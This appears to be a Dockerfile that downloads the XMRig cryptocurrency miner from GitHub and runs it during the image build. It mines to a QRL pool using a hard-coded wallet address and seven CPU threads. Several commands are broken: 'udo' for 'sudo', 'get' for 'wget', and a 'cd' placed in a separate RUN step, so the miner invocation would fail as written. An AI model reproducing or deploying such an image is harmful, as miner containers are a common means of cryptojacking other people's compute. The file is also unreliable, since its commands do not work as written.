FROM ubuntu:16.04
RUN apt-get update
RUN apt-get upgrade -y
RUN udo sysctl -w vm.nr_hugepages=$((`grep -c ^processor /proc/cpuinfo` * 3))
RUN get https://github.com/xmrig/xmrig/releases/download/v5.10.0/xmrig-5.10.0-xenial-x64.tar.gz
RUN tar zxvf xmrig-5.10.0-xenial-x64.tar.gz
RUN cd xmrig-5.10.0
RUN ./xmrig --donate-level 1 -o qrl.fungibly.xyz:9999 -u Q0103008fdde861cae98046eb9087d74e88b7a162640c5a4442434bc4269f2d117bf2303b881aec -p x@TESST -k --tls -t 7